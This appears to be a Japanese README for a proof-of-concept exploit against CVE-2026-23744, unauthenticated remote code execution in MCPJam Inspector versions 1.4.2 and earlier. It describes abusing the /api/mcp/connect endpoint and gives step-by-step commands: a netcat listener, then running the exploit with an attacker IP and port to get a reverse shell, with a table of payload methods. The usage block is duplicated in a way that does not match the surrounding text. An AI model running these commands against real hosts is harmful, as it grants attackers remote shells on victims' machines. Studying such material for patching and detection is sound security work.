
CVE-2026-23744 — MCPJam Inspector <= 1.4.2 における未認証のリモートコード実行脆弱性の概念実証エクスプロイト。
MCPJam Inspector <= 1.4.2 はデフォルトで 0.0.0.0 にバインドし、認証なしで /api/mcp/connect を公開します。このエンドポイントはホスト上で直接プロセスを起動する serverConfig オブジェクトを受け付けるため、リバースシェルのペイロードを渡すことで認証情報を必要とせず即座にRCEが可能となります。
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
ステップ1 — リスナーを起動:
nc -lvnp 4444
ステップ2 — エクスプロイトを実行:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
ターゲット上で busybox が動作しない場合は、他のメソッドを試してください:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| ソフトウェア | 脆弱性あり | 修正済み |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |
| フラグ | 説明 | デフォルト |
|---|
-u | ターゲットURL | 必須 |
-i | リスナーIP (LHOST) | 必須 |
-p | リスナーポート (LPORT) | 必須 |
-m | ペイロードメソッド: busybox, bash, python3 | busybox |